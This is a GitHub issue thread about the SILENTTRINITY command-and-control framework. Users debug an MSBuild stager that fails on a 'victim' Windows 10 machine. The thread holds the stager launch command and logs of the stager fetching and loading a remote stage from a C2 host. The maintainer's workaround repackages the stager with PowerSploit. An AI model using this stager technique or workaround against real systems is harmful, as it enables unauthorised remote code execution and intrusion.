### ISSUE TITLE
Error when compiling msbuild.xml

### ISSUE THREAD

**Issue by jinkunong** [byt3bl33d3r/SILENTTRINITY#56]
# Issue Template

## Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

* SILENTTRINITY Version: 0.1.0dev
* Operating System: Windows 10 x64
* Python Version: 3.7

## Expected Behavior

Establish Session between victim windows 10 and ST server running on Kali OS

## Current Behavior

When executing msbuild.exe on the generated msbuild.xml file, it fetches the stage.zip successfully but failed to build. 

Error is listed below.

### Steps to Reproduce

Please provide detailed steps for reproducing the issue.

1. setup SILENTTRINITY as per the installation wiki
2. setup a listener and generate msbuild.xml using the msbuild stager
3. execute the generated command as shown, on the windows 10 x64 victim machine
   ...

### Failure Logs

Windows 10 x64 client:

 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe 'C:\Users\tester\Desktop\msbuild.xml'
Microsoft (R) Build Engine version 4.7.3056.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.

Build started 26/3/2019 11:39:47 PM.
URL: https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332

Trying to resolve assemblies by staging zip
Attempting HTTP POST to https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Attempting HTTP GET to https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Downloaded 2068160 bytes
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.dll in zip
'IronPython, Version=2.7.8.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Project "C:\Users\tester\Desktop\msbuild.xml" on node 1 (default targets).
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Sc
ripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`
2<System.String,System.Object>)'.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018:    at ST.CreateEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018:    at ST.RunIPYEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018:    at ST.Main(String[] args)
Done Building Project "C:\Users\tester\Desktop\msbuild.xml" (default targets) -- FAILED.

Build FAILED.

"C:\Users\tester\Desktop\msbuild.xml" (default target) (1) ->
(Hello target) ->
  C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Sc
ripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`
2<System.String,System.Object>)'.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018:    at ST.CreateEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018:    at ST.RunIPYEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018:    at ST.Main(String[] args)

    0 Warning(s)
    1 Error(s)

Time Elapsed 00:08:15.00

No error from the running st.py on my kali OS.
Able to see the staging established successfully.

Kali OS:
ST (stagers)(msbuild) ≫ generate https                                                                                                           
[+] Generated stager to msbuild.xml
[*] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
[*] Sending stage (2068193 bytes) ->  192.168.0.111 ...
ST (stagers)(msbuild) ≫

**Comment by byt3bl33d3r** [comment]
this is because of https://github.com/byt3bl33d3r/SILENTTRINITY/pull/55, i forgot to update the stager templates. IronPython version was downgraded to 2.7.8 in order to support .NET 4.0

**Comment by donnybrosko** [comment]
Is there any active workaround or manual fix for this currently?

**Comment by byt3bl33d3r** [comment]
You can recompile the stager, run it through Out-CompressedDLL from PowerSploit and replace the Base64 blob in the msbuild file with it's output. I should hopefully be taking care of this tonight though

**Comment by byt3bl33d3r** [comment]
This should be fixed @jinkunong @donnybrosko. Let me know otherwise.

**Comment by donnybrosko** [comment]
Still getting Failed Build after a git Pull

**Comment by donnybrosko** [comment]
Microsoft (R) Build Engine version 4.7.2558.0
 [Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.
Build started 3/29/2019 9:17:43 AM.
URL: https://{target}/1ecf0168-1776-4202-8c6c-0a1d496293e8
Trying to resolve assemblies by staging zip
Attempting HTTP POST to https://{target}/1ecf0168-1776-4202-8c6c-0a1d496293e8
Attempting HTTP GET to https://{target}/1ecf0168-1776-4202-8c6c-0a1d496293e8
Downloaded 2068160 bytes
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.dll in zip
'IronPython, Version=2.7.8.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Project "\\{target}\SMB\msbuild.xml" on node 1 (default targets).
\\{target}\SMB\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.
\\{target}\SMB\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Scripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`2<System.String,System.Object>)'.
\\{target}\SMB\msbuild.xml(5,5): error MSB4018:    at ST.CreateEngine()
\\{target}\SMB\msbuild.xml(5,5): error MSB4018:    at ST.RunIPYEngine()
\\{target}\SMB\msbuild.xml(5,5): error MSB4018:    at ST.Main(String[] args)
Done Building Project "\\{target}\SMB\msbuild.xml" (default targets) -- FAILED.
Build FAILED.
"\\{target}\SMB\msbuild.xml" (default target) (1) ->
 (Hello target) ->
\\{target}\SMB\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.
\\{target}\SMB\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Scripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`2<System.String,System.Object>)'.
\\{target}\SMB\msbuild.xml(5,5): error MSB4018:    at ST.CreateEngine()
\\{target}\SMB\msbuild.xml(5,5): error MSB4018:    at ST.RunIPYEngine()
\\{target}\SMB\msbuild.xml(5,5): error MSB4018:    at ST.Main(String[] args)
0 Warning(s)
1 Error(s)
Time Elapsed 00:00:00.59

**Comment by byt3bl33d3r** [comment]
Closing.
